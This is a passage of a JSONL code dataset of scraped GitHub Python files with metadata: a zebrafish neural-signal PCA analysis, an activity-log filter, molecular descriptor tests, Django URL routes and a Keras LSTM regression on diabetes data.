37, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sounddevice.play", "line_number": 70, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}]}
+{"seq_id": "75056266329", "text": "# %%\nfrom IPython import get_ipython;\n\nget_ipython().magic('reset -sf')\n\n# %% imports\nimport os\nimport numpy as np\nimport pandas as pd\nimport more_itertools as it\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport xlsxwriter\nfrom sklearn.decomposition import PCA\n\n\n# %%\n\n# custom functions\ndef get_baseline(signal, window, percentile):\n baseline = []\n\n for window_data in it.windowed(signal.T, n=window, step=1):\n base = np.percentile(np.array(window_data), percentile, axis=0)\n baseline.append(base)\n\n return np.array(baseline).T\n\n\ndef crop_to_window(signal, window):\n \"\"\"\n Returns signal without half window at the begining and half window at the end.\n Crops along 0 dimention!!!!\n\n :param signal: signal to crop\n :param window: sliidng window size\n :return: cropped signal\n \"\"\"\n half_window = np.floor(window / 2).astype(int)\n crop_sig = signal[half_window:-half_window]\n\n return crop_sig\n\n\ndef get_dff(signal, baseline=None):\n if baseline is None:\n window = 21\n percentile = 8\n baseline = get_baseline(signal, window, percentile)\n signal = crop_to_window(signal.T, window).T\n\n return (signal - baseline) / baseline\n\n\ndef get_stim(stim_pattern, stim_len):\n \"\"\"\n Returns np.array of int : stimuli label for the current state.\n Assuming b1>1>b2>3\n\n :param stim_pattern: the pattern to repeat\n :param stim_len: stimulus length\n :return: array of indices : 0 for b1 , 1 for 1 dot, 2 for b2 and 3 to 3 points.\n \"\"\"\n stim_cycle = len(stim_pattern)\n\n # can modify here to start at any point\n stimulus = (stim_pattern * int(np.ceil(stim_len / stim_cycle)))[0:stim_len]\n stimulus = [int(x) for x in stimulus]\n return np.array(stimulus)\n\n\n# %% load extracted signals\ninput_folder = 'D:/Code/repos/numerosity/Anna_20200717/all_neurons/fish1'\nfish_name = 'fish1'\ninput_file = f'{input_folder}/{fish_name}_signals_diam2_NxT.csv'\nsignal = np.loadtxt(input_file, delimiter=',', dtype=float)\n\nprint(f'N cells : {len(signal)}')\nX = signal\n# %% Preprocess for PCA\ndff = get_dff(signal)\nprint(f'dff shape : {dff.shape}')\nX = dff.T\n# %%\npca = PCA(n_components=100)\npca.fit(X)\n\nplt.plot((pca.explained_variance_ / np.sum(pca.explained_variance_)) * 100)\nplt.xlabel('PC')\nplt.ylabel('% var. explained')\nplt.xlim([0, 10])\nplt.show()\n\n# %%\nX_pca = pca.transform(X)\n# %%\nplt.subplot(2, 2, 1)\nplt.plot(X_pca[:, 0], X_pca[:, 1], '.')\nplt.xlabel('PC 1')\nplt.ylabel('PC 2')\n\nplt.subplot(2, 2, 2)\nplt.plot(X_pca[:, 0], X_pca[:, 2], '.')\nplt.xlabel('PC 1')\nplt.ylabel('PC 3')\n\nplt.subplot(2, 2, 3)\nplt.plot(X_pca[:, 1], X_pca[:, 2], '.')\nplt.xlabel('PC 2')\nplt.ylabel('PC 3')\n\nplt.subplot(2, 2, 4)\nplt.plot(X_pca[:, 1], X_pca[:, 3], '.')\nplt.xlabel('PC 2')\nplt.ylabel('PC 4')\nplt.show()\n\n# %%\nPC1_neg = X_pca[0, :] < 0\nPC1_pos = X_pca[0, :] > 0\nprint(f'num positive : {np.sum(PC1_pos)}, num negative : {np.sum(PC1_neg)}')\n# %%\nPC1_temporal = np.mean(X * X_pca[:, [0]], axis=0)\nplt.plot(PC1_temporal)\nplt.ylabel('I, a.u.')\nplt.xlabel('time')\nplt.title('PC1')\nplt.show()\n# %%\nPC1_temporal = np.mean(X * X_pca[:, [1]], axis=0)\nplt.plot(PC1_temporal)\nplt.ylabel('I, a.u.')\nplt.xlabel('time')\nplt.title('PC2')\nplt.xlim([750, 800])\nplt.show()\n\n# %%\n# %% Generate stimulus pattern\nwindow = 21\npercentile = 8\nstim_pattern = '00000111112222233333'\nstimulus = get_stim(stim_pattern, signal.shape[1])\ncrop_stim = crop_to_window(stimulus, window)\n# %% plot box-plots for DFF\n\nblank1 = dff[:, crop_stim == 0]\ndot1 = dff[:, crop_stim == 1]\nblank2 = dff[:, crop_stim == 2]\ndot3 = dff[:, crop_stim == 3]\n# %%\nneurons = PC1_neg\n\nall_arr = [np.mean(blank1[neurons, :], axis=1),\n np.mean(dot1[neurons, :], axis=1),\n np.mean(blank2[neurons, :], axis=1),\n np.mean(dot3[neurons, :], axis=1)]\n\nsns.boxplot(data=all_arr)\nplt.xticks([0, 1, 2, 3], ['blank 1', '1 dot', 'blank 1', '3 dots'])\nplt.ylabel('dF/F')\nplt.title(f'{fish_name}, sld.w {window}, prct. {percentile}')\n\n# plt.savefig(f'{input_folder}/{fish_name}_boxplot_dff.png')\nplt.show()\n\n# %%\n# %%\npc1 = 6\npc2 = 5\n\nstim1 = X_pca[crop_stim == 0, :]\nstim2 = X_pca[crop_stim == 1, :]\nstim12 = X_pca[crop_stim < 2, :]\n\nplt.plot(stim1[:, pc1], stim1[:, pc2], '.b')\nplt.plot(stim2[:, pc1], stim2[:, pc2], '.r')\n\n# plt.plot(stim12[:, pc1], stim12[:, pc2], 'k',linewidth=0.2)\n\nplt.xlabel(f'PC {pc1}')\nplt.ylabel(f'PC {pc2}')\nplt.legend(['blank 1', 'dot 1'])\nplt.title('PCA on Brain states')\nplt.show()\n# %%\nsns.distplot(pca.components_[pc2, :])\nplt.show()\n# %%\n\n", "repo_name": "LemonJust/numerosity", "sub_path": "explore_data.py", "file_name": "explore_data.py", "file_ext": "py", "file_size_in_byte": 4524, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "IPython.get_ipython", "line_number": 4, "usage_type": "call"}, {"api_name": "more_itertools.windowed", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 77, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 158, "usage_type": "call"}, {"api_name": "seaborn.boxplot", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}]}
+{"seq_id": "31795921740", "text": "import json\r\nimport sys\r\n\r\nwith open('./activity_log_full', 'r') as f:\r\n logs = json.load(f)\r\n\r\nuser = sys.argv[1]\r\nprint(user)\r\nfor i in logs:\r\n if i['caller'] == user:\r\n print('The caller is ', user)\r\n print(json.dumps(i['authorization']['action'], indent=4))\r\n\r\n\t\r\n", "repo_name": "ozendorf/sobek", "sub_path": "used_actions.py", "file_name": "used_actions.py", "file_ext": "py", "file_size_in_byte": 286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "74880259930", "text": "import tempfile\nimport unittest as ut\n\nimport datamol as dm\nimport joblib\nimport numpy as np\nimport pytest\n\nfrom molfeat.calc import (\n CATS,\n ElectroShapeDescriptors,\n RDKitDescriptors2D,\n RDKitDescriptors3D,\n ScaffoldKeyCalculator,\n USRDescriptors,\n MordredDescriptors,\n)\nfrom molfeat.calc.skeys import skdistance\n\nfrom molfeat.utils import requires\n\n\nclass TestDescPharm(ut.TestCase):\n r\"\"\"Test cases for descriptors and pharmacophore generation\"\"\"\n smiles = [\n \"CCOc1c(OC)cc(CCN)cc1OC\",\n \"COc1cc(CCN)cc(OC)c1OC\",\n \"C[C@@H]([NH3+])Cc1c2ccoc2c(Br)c2ccoc12\",\n ]\n EXTRA_LARGE_MOL = \"CC(C)CC(NCCNC(=O)C(CCC(O)=O)NC(C)=O)C(=O)NC(Cc1ccc(O)cc1)C(=O)NC(CC(C)C)C(=O)NC(C(C)C)C(=O)NC(C)C(=O)NCC(=O)NC(CCC(O)=O)C(=O)NC(CCCNC(N)=N)C(=O)NCC(=O)NC(Cc1ccccc1)C(=O)NC(Cc1ccccc1)C(=O)NC(Cc1ccc(O)cc1)C(=O)NC(C(C)O)C(=O)N1CCCC1C(=O)NC(C)C(O)=O\"\n\n @pytest.mark.xfail(not requires.check(\"mordred\"), reason=\"3rd party module mordred is missing\")\n def test_mordred(self):\n calc = MordredDescriptors()\n fps = calc(self.smiles[0])\n self.assertEqual(len(fps), len(calc))\n\n def test_rdkit2d(self):\n calc = RDKitDescriptors2D()\n fps = calc(self.smiles[0])\n self.assertEqual(len(fps), len(calc))\n\n sm = \"CC[C@@H]1[C@@H]2C[C@H](O)CC[C@]2(C)[C@H]2CC[C@@]3(C)[C@@H](CC[C@@H]3[C@H](C)CCOS(=O)(=O)O[Na])[C@@H]2[C@@H]1O\"\n sm_disconnected = \"CC[C@@H]1[C@@H]2C[C@H](O)CC[C@]2(C)[C@H]2CC[C@@]3(C)[C@@H](CC[C@@H]3[C@H](C)CCOS(=O)(=O)[O-])[C@@H]2[C@@H]1O.[Na+]\"\n # force sanitization would return same descriptors for both of this\n fps = calc(sm)\n fps2 = calc(sm_disconnected)\n np.testing.assert_allclose(fps, fps2)\n # with the fix we should not have any value that is nan after sanitization\n # neither for Charge related or BCut2D properties\n self.assertFalse(np.isnan(fps).any())\n\n # we should have nan values at all bcut columns\n # if we do not standardize\n calc_nan = RDKitDescriptors2D(do_not_standardize=True)\n fps = calc_nan(sm)\n bcut_cols = [i for i, x in enumerate(calc.columns) if \"bcut\" in x.lower()]\n self.assertTrue(np.isnan(fps[bcut_cols]).all())\n\n def test_rdkit2d_large_mol_no_ipc(self):\n # sanity check for large molecules that will hang forerever\n calc = RDKitDescriptors2D(ignore_descrs=[\"Ipc\", \"AvgIpc\"])\n fps = calc(self.EXTRA_LARGE_MOL)\n self.assertEqual(len(fps), len(calc))\n\n def test_rdkit3d(self):\n calc = RDKitDescriptors3D()\n mol = dm.conformers.generate(dm.to_mol(self.smiles[0]))\n fps = calc(mol)\n self.assertEqual(len(fps), len(calc))\n\n def test_cats_2d(self):\n smiles = \"Nc1cnn(-c2ccccc2)c(=O)c1Cl\"\n mol = dm.to_mol(smiles)\n\n calc = CATS(max_dist=5, scale=\"raw\", use_3d_distances=False)\n assert calc(mol).shape == (126,)\n\n def test_cats_3d_missing_conformer(self):\n smiles = \"Nc1cnn(-c2ccccc2)c(=O)c1Cl\"\n mol = dm.to_mol(smiles)\n\n calc = CATS(max_dist=5, scale=\"raw\", use_3d_distances=True)\n\n with pytest.raises(ValueError):\n calc(mol)\n\n def test_cats_3d(self):\n smiles = \"Nc1cnn(-c2ccccc2)c(=O)c1Cl\"\n mol = dm.to_mol(smiles)\n mol = dm.conformers.generate(mol)\n\n calc = CATS(max_dist=5, scale=\"raw\", use_3d_distances=True)\n assert calc(mol).shape == (126,)\n\n def test_cats_pickle(self):\n smiles = \"Nc1cnn(-c2ccccc2)c(=O)c1Cl\"\n mol = dm.to_mol(smiles)\n\n calc = CATS(max_dist=5, scale=\"raw\", use_3d_distances=False)\n\n # compute fp\n fp1 = calc(mol)\n\n fpath = tempfile.NamedTemporaryFile().name\n\n # pickle\n joblib.dump(calc, fpath)\n\n # unpickle\n calc = joblib.load(fpath)\n\n # compute fp\n fp2 = calc(mol)\n\n # check\n assert np.allclose(fp1, fp2)\n\n def test_shape_descriptors(self):\n calc = USRDescriptors(\"usrcat\")\n with self.assertRaises(ValueError):\n calc(self.smiles[0])\n mol_with_conf = dm.conformers.generate(dm.to_mol(self.smiles[0]))\n out = calc(mol_with_conf)\n self.assertEqual(out.shape[-1], len(calc))\n\n calc2 = ElectroShapeDescriptors(\"mmff94\")\n out2 = calc2(mol_with_conf)\n self.assertEqual(out2.shape[-1], len(calc2))\n\n def test_scaffkey(self):\n calc = ScaffoldKeyCalculator()\n fps = calc(self.smiles[0])\n columns = calc.columns\n col_to_check = [\n \"n_atom_in_rings\",\n \"n_nitrogen\",\n \"n_heteroatoms\",\n \"n_ring_system\",\n \"n_carbon_het_carbon_het_bonds\",\n ]\n expected_output = [6, 1, 4, 1, 2]\n comp_res = [fps[columns.index(x)] for x in col_to_check]\n self.assertEqual(expected_output, comp_res)\n\n def test_scaff_skdist(self):\n calc = ScaffoldKeyCalculator()\n smiles = dm.freesolv()[\"smiles\"][:10].tolist()\n fps = [calc(x) for x in smiles]\n fps1 = np.asarray(fps[:6])\n fps2 = np.asarray(fps[6:])\n # compute batch\n pairwise_dist = skdistance(fps1, fps2, cdist=True)\n # compute singletons\n dist = []\n for i in range(fps2.shape[0]):\n dist.append(skdistance(fps[0], fps2[i, :], cdist=False))\n\n np.testing.assert_allclose(np.asarray(dist), pairwise_dist[0, :])\n\n\nif __name__ == \"__main__\":\n ut.main()\n", "repo_name": "datamol-io/molfeat", "sub_path": "tests/test_descriptors.py", "file_name": "test_descriptors.py", "file_ext": "py", "file_size_in_byte": 5458, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 131, "dataset": "github-code", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 23, "usage_type": "attribute"}, {"api_name": "molfeat.calc.MordredDescriptors", "line_number": 34, "usage_type": "call"}, {"api_name": "pytest.mark.xfail", "line_number": 32, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 32, "usage_type": "attribute"}, {"api_name": "molfeat.utils.requires.check", "line_number": 32, "usage_type": "call"}, {"api_name": "molfeat.utils.requires", "line_number": 32, "usage_type": "name"}, {"api_name": "molfeat.calc.RDKitDescriptors2D", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 51, "usage_type": "call"}, {"api_name": "molfeat.calc.RDKitDescriptors2D", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 58, "usage_type": "call"}, {"api_name": "molfeat.calc.RDKitDescriptors2D", "line_number": 62, "usage_type": "call"}, {"api_name": "molfeat.calc.RDKitDescriptors3D", "line_number": 67, "usage_type": "call"}, {"api_name": "datamol.conformers.generate", "line_number": 68, "usage_type": "call"}, {"api_name": "datamol.conformers", "line_number": 68, "usage_type": "attribute"}, {"api_name": "datamol.to_mol", "line_number": 68, "usage_type": "call"}, {"api_name": "datamol.to_mol", "line_number": 74, "usage_type": "call"}, {"api_name": "molfeat.calc.CATS", "line_number": 76, "usage_type": "call"}, {"api_name": "datamol.to_mol", "line_number": 81, "usage_type": "call"}, {"api_name": "molfeat.calc.CATS", "line_number": 83, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 85, "usage_type": "call"}, {"api_name": "datamol.to_mol", "line_number": 90, "usage_type": "call"}, {"api_name": "datamol.conformers.generate", "line_number": 91, "usage_type": "call"}, {"api_name": "datamol.conformers", "line_number": 91, "usage_type": "attribute"}, {"api_name": "molfeat.calc.CATS", "line_number": 93, "usage_type": "call"}, {"api_name": "datamol.to_mol", "line_number": 98, "usage_type": "call"}, {"api_name": "molfeat.calc.CATS", "line_number": 100, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 105, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 108, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 117, "usage_type": "call"}, {"api_name": "molfeat.calc.USRDescriptors", "line_number": 120, "usage_type": "call"}, {"api_name": "datamol.conformers.generate", "line_number": 123, "usage_type": "call"}, {"api_name": "datamol.conformers", "line_number": 123, "usage_type": "attribute"}, {"api_name": "datamol.to_mol", "line_number": 123, "usage_type": "call"}, {"api_name": "molfeat.calc.ElectroShapeDescriptors", "line_number": 127, "usage_type": "call"}, {"api_name": "molfeat.calc.ScaffoldKeyCalculator", "line_number": 132, "usage_type": "call"}, {"api_name": "molfeat.calc.ScaffoldKeyCalculator", "line_number": 147, "usage_type": "call"}, {"api_name": "datamol.freesolv", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 151, "usage_type": "call"}, {"api_name": "molfeat.calc.skeys.skdistance", "line_number": 153, "usage_type": "call"}, {"api_name": "molfeat.calc.skeys.skdistance", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 159, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 163, "usage_type": "call"}]}
+{"seq_id": "25158365656", "text": "from django.urls import path\nfrom . import views\n\n\n\nurlpatterns = (path('login/', views.login),\n path('consent/', views.consent),\n path('instructions/', views.instructions),\n path('decision/', views.decision),\n path('question/', views.question),\n path('feedback/', views.feedback),\n\n )\n", "repo_name": "ErikOSorensen/mmrisk_instrument", "sub_path": "mmr2web/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}]}
+{"seq_id": "36753279681", "text": "\nfrom keras.utils import np_utils\nfrom keras.models import Sequential, Model \nfrom keras.layers import Input, Dense , LSTM, Conv2D, Flatten, MaxPool2D, Dropout, BatchNormalization\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard\n\nfrom sklearn.datasets import load_diabetes\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler\n\nimport matplotlib.pyplot as plt \nimport numpy as np\n\n\ndiabetes = load_diabetes()\nx, y = diabetes.data, diabetes.target\n\n\n# print(x.shape) # (442, 10)\n# print(y.shape) # (442, )\nprint(x[0])\nprint(\"===================\")\n\n\nx = x[:, 0:4]\n\nprint(x[0]) # [[0.03807591 0.05068012 0.06169621 0.02187235]]\n\nx = np.round(x,4)\n\nprint(x[0]) # [0.0381 0.0507 0.0617 0.0219]\nprint(y[0]) \nprint(x.shape) # (442, 4)\n\n\n#####################################\n\nstandard_scaler = StandardScaler() \n\n# x = standard_scaler.fit_transform(x)\n\n\nrobust_scaler = RobustScaler()\n\nx = robust_scaler.fit_transform(x)\n\n####################################\n\nprint(x.shape)\n\nx = x.reshape(442,4,1)*100\n\n\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(\n \n x, y, shuffle = True , train_size = 0.8 \n)\n\n\n\n\n# 모델 \n\nmodel = Sequential()\nmodel.add(LSTM(32, activation='relu', input_shape = (4,1)))\nmodel.add(Dense(16, activation= 'relu')) \nmodel.add(Dense(32, activation= 'relu' )) \nmodel.add(Dropout(0.2))\n\n\nmodel.add(Dense(64, activation= 'relu')) \nmodel.add(Dense(64, activation= 'relu')) \nmodel.add(Dense(64, activation= 'relu')) \nmodel.add(Dropout(0.2))\n\nmodel.add(Dense(64, activation= 'relu')) \nmodel.add(Dense(64, activation= 'relu')) \nmodel.add(Dense(64, activation= 'relu')) \nmodel.add(Dropout(0.2))\n\n\nmodel.add(Dense(32, activation= 'relu')) \nmodel.add(Dense(16, activation= 'relu')) \nmodel.add(Dense(16, activation= 'relu')) \nmodel.add(Dropout(0.2))\n\nmodel.add(Dense(1, activation= 'relu')) \n\n\n# 3. 컴파일, 훈련\n\nfrom keras.callbacks import EarlyStopping \nfrom keras.optimizers import Adam\n\nearly_stopping = EarlyStopping( monitor='loss', patience= 10, mode ='auto')\n\nmodel.compile(loss='mse', optimizer= Adam (lr=0.001, beta_1=0.9, beta_2=0.999), metrics=['mse'])\n\nhist = model.fit(x_train,y_train, epochs= 1000, batch_size= 2, validation_split= 0.2)\n\n\n\n# 평가 및 예측 \n\n\nloss, mse = model.evaluate(x_test,y_test, batch_size=1)\n\n\nprint('loss :', loss)\nprint('mse : ', mse)\n\n\ny_pred = model.predict(x_test)\n\nfrom sklearn.metrics import r2_score\nr2 = r2_score(y_test,y_pred)\n\nprint(\"R2 score : \", r2)\n\n\n'''\n\nloss : 3880.6124057280886\nmse : 3880.61279296875\nR2 score : 0.40212287079390385\n\n\n'''", "repo_name": "votus777/AI_study", "sub_path": "keras/keras80_diabets_LSTM.py", "file_name": "keras80_diabets_LSTM.py", "file_ext": "py", "file_size_in_byte": 2672, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sklearn.datasets.load_diabetes", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 